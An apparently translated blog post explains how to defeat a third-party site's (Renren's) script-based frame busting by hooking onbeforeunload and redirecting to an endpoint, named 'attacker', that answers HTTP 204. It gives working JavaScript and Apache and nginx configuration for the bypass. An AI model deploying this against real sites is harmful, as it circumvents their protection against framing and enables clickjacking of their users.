Bypassing iframe busting

Recently, for a project, we needed to embed third-party sites, such as 人人網 (Renren), inside an iframe on our pages. After the front-end engineer ran into a problem with this, I went over and had a look, and found that the cause was that Renren does iframe busting (frame busting).


After looking into it, the cleanest way to deal with this turned out to be an HTTP 204 (No Content) response.


The description of status 204 in RFC 2616 already tells you what it does, and why it helps here:

The server has fulfilled the request but does not need to return an entity-body, and might want to return updated metainformation. The response MAY include new or updated metainformation in the form of entity-headers, which if present SHOULD be associated with the requested variant.

If the client is a user agent, it SHOULD NOT change its document view from that which caused the request to be sent. This response is primarily intended to allow input for actions to take place without causing a change to the user agent's active document view, although any new or updated metainformation SHOULD be applied to the document currently in the user agent's active view.


In other words: when the frame-busting script inside the framed page assigns top.location, our top-level document receives a navigation it can intercept in onbeforeunload. If the framing page replaces that pending navigation with a request whose response is 204, the browser, per the text above, leaves the current document in place, and the frame survives. So, on the framing page, hook onbeforeunload and add this code:

    var preventBusting = 0;
    // The framed page's frame buster assigns top.location; that fires
    // onbeforeunload on our top-level document before the navigation commits.
    window.onbeforeunload = function () { preventBusting++; };
    setInterval(function () {
        if (preventBusting > 0) {
            // Decrement by 2: the 204 navigation started below fires
            // onbeforeunload once more and would otherwise keep the counter positive.
            preventBusting -= 2;
            // Swap the pending navigation for a URL that answers 204;
            // the browser then keeps the current document and the frame stays.
            window.top.location = 'http://yourwebserver/attacker';
        }
    }, 0.5); // milliseconds; browsers clamp sub-millisecond delays to their minimum

If you run Apache, add the line below to answer that URL with 204. RedirectMatch is provided by mod_alias, so the directive must come after alias_module is loaded; with a non-3xx status such as 204, RedirectMatch takes no target URL:

 RedirectMatch 204 attacker(.*)$

With nginx it is much the same:

location = /attacker {
            return 204;
         }

Tested and working. Note that this only defeats script-based frame busting: an X-Frame-Options header or a CSP frame-ancestors directive is enforced by the browser before the framed page's script ever runs, and cannot be bypassed this way.
